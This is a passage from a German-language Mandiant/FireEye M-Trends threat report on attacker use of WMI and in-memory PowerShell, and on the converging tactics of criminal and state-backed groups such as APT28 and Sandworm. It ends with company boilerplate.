stehlen und für sie nützliche Daten zu finden.
Seit einigen Jahren wird PowerShell auch von zahl-
reichen Informationssicherheitsspezialisten und als
Bestandteil von Tools für Penetrations­tests genutzt.
Aufgrund dessen sind nun mehr Informationen und
Quellcode öffentlich zugänglich, sodass Angreifer
und Verteidiger sich besser informieren können.
Oben wurde beschrieben, wie Angreifer WMI-
Ereignisse nutzen, um sich dauerhaften Zugang zu
gehackten Umgebungen zu verschaffen. Darüber
hinaus nutzen Angreifer auch das Befehlszeilentool
wmic.exe, das die Funktionen von WMI auf Shells
und Skripte ausdehnt. Mit WMI können Angreifer
sich per Fernzugriff Zugang zu Systemen verschaf-
fen, Änderungen in der Registry vornehmen, auf
Logdateien zugreifen und natürlich Befehle aus-
führen. Bis auf die Anmeldung lassen per Fernzu-
griff ausgeführte WMI-Befehle kaum Spuren auf
den betroffenen Systemen zurück.
In mehreren der von uns 2014 untersuchten Fälle
nutzten Angreifer per Fernzugriff gestartete Pow-
erShell-Befehle und -Skripte, die vollständig im Ar-
beitsspeicher ausgeführt wurden, um Umgebungen
auszuspionieren und Anmeldedaten zu stehlen. Da
der PowerShell-Code vollständig im Arbeitsspei­
cher ausgeführt wird, hinterlässt er keine Spuren
auf der Festplatte, was die Analyse dieser Vorfälle
deutlich erschwert. In den meisten Umgebungen ist
standardmäßig eine ältere Version von PowerShell
installiert, doch auch diese kann keinen detaillierten
Audit-Trail des ausgeführten Quellcodes aufzeich-
nen.
Fazit: Technisch versierte Angreifer entwickeln ihre Tools und Methoden ständig
weiter, um so wenig forensisch auswertbare Spuren zu hinterlassen wie möglich und
dadurch länger unentdeckt zu bleiben. Deshalb müssen Unternehmen in der Lage
sein, die Aktivitäten auf allen Systemen, Protokollquellen und Netzwerkgeräten in
ihrer Infrastruktur sowohl in Echtzeit zu überwachen als auch rückblickend foren­
sisch zu analysieren. Um Angreifern einen Schritt voraus zu sein, müssen die IT-
Sicherheitsverantwortlichen in Unternehmen mit dem Muster der normalen Aktivi­
täten vertraut sein und alle Abweichungen von diesem Muster untersuchen.

22. 20 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
I
m Verlauf des Jahres 2014 konnten wir mehrere
Angriffe zu russischen Hackern zurückverfolgen,
stießen dann jedoch auf eine Grauzone, in der es
sehr schwierig war, zu entscheiden, ob es sich um
eine kriminelle Bande oder einen staatlichen An-
greifer handelte. Da die verwendeten Tools und
Methoden kaum noch voneinander zu unterschei­
den sind, müssen die Analysten die Absichten des
Angreifers untersuchen, um die potenziellen Aus-
wirkungen eines Angriffs richtig einschätzen zu
können.
Einige Gruppen, deren Aktivitäten wir beobachten,
greifen gezielt Unternehmen im Finanzwesen an,
nutzen dazu aber Methoden, die größere Ähnlich-
keiten mit staatlich gesponserten APT-Aktivitäten
aufweisen als mit den Aktivitäten gewöhnlicher,
finan­ziell motivierter Krimineller. Abbildung 10 auf
Seite 21 zeigt, wie die von uns 2014 untersuchten
Angriffe bekannter APT-Gruppen und gewöhnli-
cher Internetkrimineller einander in verschiedenen
Bereichen überlappen.
Im Zeichen der Unsicherheit die
Absicht durchschauen – kein leichtes
Unterfangen
Aufgrund dieser Überlappungen ist es wichtig, dass
Sicherheitsspezialisten bei der Untersuchung un-
voreingenommen vorgehen und nicht anhand einer
Methode oder eines verwendeten Tools vorschnell
Rückschlüsse auf den Angreifer und seine Absich­
ten ziehen. Die Aktivitäten einer von uns beobach­
teten, in Russland ansässigen Hackergruppe im
Jahr 2014 sind ein gutes Beispiel dafür, warum es
so schwierig ist, die Ziele eines Angreifers zu durch-
schauen und warum dieses Wissen für die Deutung
des Angriffsverlaufs wichtig ist.
Im Oktober 2014 beschrieben wir die Aktivitäten
von APT28. Wir sind der Überzeugung, dass diese
Hackergruppe im Auftrag der russischen Regierung
vertrauliche politische und militärische Daten
stiehlt. APT28 griff mehrere Jahre lang Rüstungs-
firmen, militärische Einrichtungen, sowie staatliche
und zwischenstaatliche Organisationen an.
Andere Forscher entlarvten eine weitere in Russ-
land ansässige Angreifergruppe, die anscheinend
ebenfalls im Auftrag der russischen Regierung spio-
niert. Diese zweite Gruppe wird von verschiedenen
Forschern als „Sandworm Team,“9
, „Quedagh“10
oder
„BE2 APT“11
bezeichnet..
Trend Nr. 4:
Die Grenzen verschwimmen –
Kriminelle und APT-Actors
imitieren einander
Unsere Untersuchungen im Jahr 2014 haben bestätigt, dass sich ein neuer Trend
abzeichnet: Internetkriminelle eignen sich Taktiken an, die von APT-Actors ent­
wickelt wurden, während APT-Actors oft dieselben Tools nutzen wie gewöhnliche
Internetkriminelle. Da die verwendeten Taktiken kaum noch voneinander zu un-
terscheiden sind, müssen Analysten die Ziele der Angreifer verstehen, um die Aus-
wirkungen eines Angriffs abschätzen zu können und eine Sicherheitsstrategie zu
erstellen, die auf die vorhandenen Risiken abgestimmt ist.
9
iSight Partners, „Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day“, 14. Oktober 2014, online, aufgerufen am
2. Dezember 2014
10
https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
11
https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/

23. www.mandiant.com 21
12
https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html
13
APT18 ist eine in China ansässige Hackergruppe, siehe https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html.
Angriffsart oder
-merkmal Beispiele ähnlicher Nutzung durch kriminelle und staatlich gesponserte Angreifer
Social Engineering
Social Engineering ist kein Alleinstellungsmerkmal von APT-Gruppen mehr. Im Jahr 2014 verschickten
mehrere finanziell motivierte Angreifergruppen Spear-Phishing-E-Mails, sowohl als ersten Angriffs­
vektor als auch in wiederholten Versuchen, sich nach der Abwehr eines Angriffs erneut Zugang zum
Netzwerk des Opfers zu verschaffen. Die genutzten Phishing-E-Mails wurden dabei individuell auf die
Empfänger abgestimmt.
Interaktives Social Engineering wird ebenfalls von beiden Angreifertypen eingesetzt. In einem von uns
untersuchten Vorfall erstellten die finanziell motivierten Angreifer Profile in beliebten sozialen Netz­
werken und nahmen Kontakt mit den Mitarbeitern des Zielunternehmens auf, um sie zum Herunter-
laden von Backdoors zu bewegen. Auch APT3, ein vermutlich staatlich gesponserter Angreifer, nutzte
einen weiblichen Avatar in einem beliebten sozialen Netzwerk, um mit einem Mitarbeiter eines Zielun-
ternehmens in Kontakt zu treten. Nachdem „sie“ drei Wochen lang Nachrichten mit dem Mitarbeiter
ausgetauscht hatte, schickte „sie“ einen Lebens­lauf an seine persönliche E-Mail-Adresse, der eine von
APT3 entwickelte Backdoor enthielt. In gezielten Fragen an andere Mitarbeiter des Unternehmens
versuchte „sie“ außerdem, den Namen des IT-Managers und Einzelheiten über die verwendeten Soft-
wareversionen in Erfahrung zu bringen.
Speziell erstellte
Malware und Tools
Das Erstellen eigener, auf bestimmte Situationen zugeschnittener Tools wurde sowohl bei APT-Actors
als auch bei finanziell motivierten Internetkriminellen beobachtet. In einem Fall hatten Internetkrimi-
nelle mehrere Jahre lang Zugang zur Infrastruktur eines Opfers. In dieser Zeit entwickelten und nutzten
sie über 60 verschiedene Varianten von Malware und Tools. Die in Russland ansässige Gruppe APT28
entwickelt ihre Malware seit über sieben Jahren systematisch weiter und erstellt Malware-Plattformen,
die flexibel genug sind, um in infiltrierten Umgebungen langfristig unerkannt zu bleiben.
Crimeware
Als Crimeware bezeichnen wir Malware-Toolkits, die kostenlos oder auf dem Schwarzmarkt erhältlich
sind. Sie werden nicht nur von finanziell motivierten Internetkriminellen genutzt. Eine vermutlich in
Russ­land ansässige APT-Gruppe nutzte Zero-Day-Angriffe, um Varianten von BlackEnergy zu installie-
ren. Das Toolkit BlackEnergy ist bei Internetkriminellen seit Jahren sehr beliebt. Auch viele Remote-
Access-Tools werden sowohl von APT-Actors als auch von Internetkriminellen genutzt.12
Deshalb reicht
eine Analyse der genutzten Tools allein nicht aus, um die Angriffsart zu bestimmen.
Lange Verweildauer
in einer gehackten
Infrastruktur
Die Zeit, in der finanziell motivierte Internetangriffe in puncto Geschwindigkeit und Brutalität durchaus
mit einem Banküberfall vergleichbar waren, ist vorbei. Eine lange Verweildauer in einer infizierten Um­
gebung war früher ein Anzeichen für einen APT-Initiator, der einen komplexeren Auftrag zu erfüllen hat.
Inzwischen haben jedoch auch finanziell motivierte Hacker gezeigt, dass sie sich unauffällig verhalten
können. In einem Fall nutzten Internetkriminelle bekannte Speicherorte für das Systemstartverzeichnis,
um ihre Malware zu starten. In einem anderen Fall hatten finanziell motivierte Hacker über fünf Jahre
lang Zugriff auf die Infrastruktur ihres Opfers, bevor ihre Aktivitäten bemerkt wurden. Wir haben sogar
hartnäckige finanziell motivierte Angreifer beobachtet, die versuchten, erneut in eine Umgebung einzu­
dringen, aus der sie entfernt worden waren.
Datendiebstahl
Der Datendiebstahl breitet sich aus, nicht nur hinsichtlich des Volumens und der Art der gestohlenen
Daten, sondern auch hinsichtlich der Akteure. Das bevorzugte Ziel sind weiterhin große Verzeichnisse
personenbezogener Daten. Finanziell motivierte Kriminelle stehlen solche Daten für Betrugsversuche
oder um sie auf dem Schwarzmarkt zu verkaufen. Inzwischen sind jedoch auch andere Angreifer an
personenbezogenen Daten interessiert. Sie verfolgen dabei jedoch keine finanziellen Ziele. Wir haben
beispielsweise beobachtet, dass APT18 und andere APT-Gruppen personenbezogene Daten stehlen
– ein bislang völlig untypisches Verhalten für diesen Angreifertyp.13
Abbildung 10: Ähnlichkeiten im Vorgehen von APT-Gruppen und Internetkriminellen

24. 22 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Diese Gruppe schien es auf ähnliche Ziele abgese­
hen zu haben wie APT28, es gab jedoch einige wich-
tige Unterschiede. Zum einen nutzte die Gruppe
Zero-Day-Schwachstellen und Schwarzmarkt-
Malware. Zum anderen gibt es Anzeichen dafür,
dass sie kritische Infrastruktureinrichtungen in den
USA angriff.14, 15
Eine Analyse der bei diesen Angriffen genutzten
Malware und Infrastruktur ergab, dass das Sand-
worm-Team das Toolkit BlackEnergy16
nutzte, um
Ziele in der Ukraine anzugreifen. Das würde die an-
haltenden Spannungen zwischen der Ukraine und
Russland widerspiegeln. Manchen Berichten zu-
folge soll dieselbe Gruppe das Toolkit BlackEnergy
auch zu Angriffen auf SCADA-Systeme (Superviso-
ry Control and Data Acquisition) benutzt haben.17
Bei den angegriffenen Systemen handelte es sich
um Produktionssysteme in verschiedenen Branchen,
und nicht um herstellerspezifische Prototypen oder
Netzwerke, in denen vertrauliche Finanzdaten oder
geistiges Eigentum gespeichert oder übertragen
werden. Deshalb liegt die Vermutung nahe, dass die
Angreifer Schwach­stellen auskundschaften wollten,
die in Sabotage​versuchen ausgenutzt werden könn­
ten. Durch die Nutzung gängiger Schwarzmarkt-
tools wie BlackEnergy wollten die Angreifer ver-
mutlich ihre Anonymität wahren und bei Bedarf
glaubhaft abstreiten können, etwas mit diesem An-
griff zu tun gehabt zu haben.
Welche Rolle spielen diese
Unterschiede?
In der Sicherheitsbranche ist umstritten, wie wich­
tig es ist, die Ziele eines Angreifers zu erkennen
oder herauszufinden, welcher Hacker oder welche
Gruppe hinter einem bestimmten Angriff steckt.
Manche Forscher sind der Meinung, dass die Iden-
tität des Angreifers unter dem Gesichtspunkt der
Netzwerksicherheit keine Rolle spielt. Wichtig ist,
dass der Angriff abgewehrt, die Schäden beseitigt
und Wiederholungen verhindert werden.
Zudem wird es durch die einander überlappenden
Tools und Taktiken von finanziell motivierten Krimi-
nellen und APT-Actors auch immer schwieriger,
Fragen hinsichtlich der Absichten und potenziellen
Auswirkungen zu beantworten. Auch die Täu­
schungsmanöver und Lügen der Angreifer, die un-
terschiedliche Verfolgung von Straftaten in ver-
schiedenen Ländern und die äußerst komplizierten
Beziehungen zwischen korrupten Regierungsbeam-
ten und dem kriminellen Untergrund tragen zur
Undurchsichtigkeit der Situation bei.
Doch das Durchschauen der Absichten und Beweg-
gründe eines Angreifers kann einen Anhaltspunkt
dafür geben, wie ein Angriff am besten abgewehrt
werden kann. Ein typisches Beispiel ist das bereits
erwähnte Sandworm-Team, das vermutlich im Auf-
trag der russischen Regie­rung Spionage betreibt
und mithilfe gängiger Schwarzmarkt-Malware ver-
sucht, Zugang zu kritischen Infrastruktureinrich-
tungen in den USA zu erlangen. Obwohl die genutz-
ten Tools aus technischer Sicht nichts Besonderes
sind, wäre es ein großer Fehler, diese Angriffe wie
die nahezu alltäglichen Angriffe der „kleinen Fische“
unter den Internetkriminellen zu behandeln.
Wenn Sie wüssten, dass die Malware in Ihrem Netz­
werk nur die erste Etappe eines staatlich beauftrag­
ten Angriffs ist, würden Sie sicher anders darauf re-
agieren als auf eine Infektion mit Malware, die von
Opportunisten in einem breit gestreuten Angriff
eingeschleust wurde. Auch bei einem Diebstahl
personenbezogener Daten hängt die Reaktion da­
von ab, ob die Diebe gewöhnliche Kriminelle sind,
die sich „nur“ auf Ihre Kosten bereichern wollen,
oder ob die Daten aus schwerer durchschaubaren
Gründen im Auftrag einer Regierung gestohlen
wurden.
14
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
15
https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml
16
BlackEnergy ist ein erweiterbares Framework, das Hacker mithilfe einer Sammlung aus DLL-Dateien (Dynamic Link Libraries) durch die gewünschten
Funktionen ergänzen können. Jedes DLL-Plugin kann für einen bestimmten Zweck geschrieben oder modifiziert und als verschlüsselte Datei gespei-
chert werden. In ihrer verschlüsselten Form sehen die DLL-Dateien alle gleich aus und lassen keine Rückschlüsse auf die Absichten des Angreifers zu.
Bislang wurde BlackEnergy hauptsächlich für DDoS-Angriffe (Distributed Denial of Service, verteilte Dienstblockade) verwendet, siehe http://at-
las-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/security-connected/evolving-ddos-botnets-1-
blackenergy)
17
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
Fazit: Da die Tools, Methoden und Vorgehensweisen von Internetkriminellen und
APT-Actors einander immer mehr ähneln, gewinnt die Analyse der Ziele und Beweg­
gründe der Angreifer an Bedeutung. Nur so können Sie die potenziellen Auswirkun­
gen eines Angriffs auf Ihre Infrastruktur richtig einschätzen, angemessen reagieren
und eine Sicherheitsstrategie entwickeln, die auf die tatsächlich bestehenden Be­
dro­hungen abgestimmt ist.

25. www.mandiant.com 23
D
as Thema Cybersecurity interessiert in­
zwischen ein breites Publikum. Angesichts
dieser Tatsache sollten Einbrüche in die In-
frastruktur des eigenen Unternehmens nicht mehr
als etwas betrachtet werden, vor dem man sich
fürchtet oder für das man sich schämen muss. An-
griffe dieser Art sind inzwischen Teil der geschäftli-
chen Realität. Deshalb gilt es, sich auf sie vorzube­
reiten und selbstsicher auf sie zu reagieren.
Eine solche Selbstsicherheit setzt einen neuen An-
satz für die Cybersecurity voraus. Niemand kann
jeden Angriff abwehren. Doch wenn Sie die raffi­
niertesten Bedrohungen schnell und effektiv auf-
decken, analysieren und angemessen auf sie reagie-
ren, können Sie Ihr Unternehmen, Ihre Kunden und
Ihre Partner vor Konsequenzen bewahren, die
Schlagzeilen machen.
Sicherheitsmaßnahmen sind nie perfekt und nie-
mand kann jede neue Angriffsmethode vorherse­
hen. Auch 2014 wurde wieder deutlich, dass kein
Internetkrimineller aufgibt, nur weil ein Angriff
durch ein neues Sicherheitstool vereitelt wurde.
Doch mit der richtigen Kombination aus Technik,
Informationen und Sachkenntnis können Sie die
Lücken in Ihren Sicherheitsvorkehrungen schließen.
Sie können Ihre Sicherheitsmaß­nahmen ständig
weiterentwickeln, um neuen Bedrohungen, neuen
Tools und neuen Angriffsmaschen gewachsen zu
sein und Ihr Netzwerk zu schützen.
Die Angreifer sind intelligent, gut ausgerüstet
und hartnäckig. Es gibt keinen Grund, warum
dies nicht auch auf die Verteidiger zutreffen
sollte.
Schlussfolgerung
Auch 2014 entwickelten die Hacker sich weiter und fanden neue Methoden, um
den Kreis ihrer Opfer auszuweiten. Doch in einem wichtigen Punkt blieb alles beim
Alten: Zu viele Unternehmen waren nicht auf den früher oder später unvermeidli-
chen Angriff vorbereitet, sodass die Eindringlinge viel zu lange unbemerkt blieben.

26. 24 www.mandiant.com
Ein Bericht von der CyberfrontM-Trends
Über Mandiant
Mandiant, ein Tochterunternehmen von FireEye, hat die Computernetzwerke und Endpunkte von Hunder-
ten von Unternehmen in allen wichtigen Branchen von Eindringlingen befreit und gegen erneute Angriffe
gesichert. Mandiant ist der bevorzugte Partner für Fortune-500-Unternehmen und Behörden, die kritische
Sicherheitsverletzungen aller Art verhindern oder angemessen auf sie reagieren möchten. Mandiant Securi-
ty Consulting Services nutzen Bedrohungsdaten und Technik von FireEye, um die Opfer von Cyberangriffen
beim Kampf gegen die Angreifer und der erneuten Sicherung ihrer Netzwerke zu unterstützen.
Über FireEye
FireEye schützt die wertvollsten Ressourcen weltweit vor Internetangriffen. Unsere Kombination aus Tech­
nik, Wissen, Expertise und einem äußerst reaktionsschnellen Notfallteam trägt dazu bei, die Auswirkungen
von Angriffen zu mindern. Wir entlarven und stoppen Angreifer in jeder Phase eines Angriffs und decken
Angriffe auch im frühesten Stadium auf. Mit unserer Hilfe können Sie ermitteln, welchem Risiko Ihre wert­
vollsten Ressourcen bei einem Angriff ausgesetzt wären. Darüber hinaus unterstützen wir Sie dabei, sich für
die schnelle und erfolgreiche Abwehr von Angriffen zu rüsten. Die weltweite Gemeinschaft von FireEye für
die Cybersecurity umfasst über 2.700 Kunden in 67 Ländern, darunter mehr als 157 Fortune-500-Unter­
nehmen.

28. Mandiant, ein Tochterunternehmen von FireEye®
| (+1) 703.683.3141 | (+1) 800.647.7020 | info@mandiant.com | www.mandiant.com
© 2015 FireEye, Inc. Alle Rechte vorbehalten. Mandiant und das M-Logo sind eingetragene Marken von
FireEye, Inc. Alle anderen Marken, Produkte oder Servicenamen sind möglicherweise eingetragene Marken
oder Servicemarken ihrer jeweiligen Inhaber. RPT.MTRENDS.DE-DE.022415
A FireEye®
Company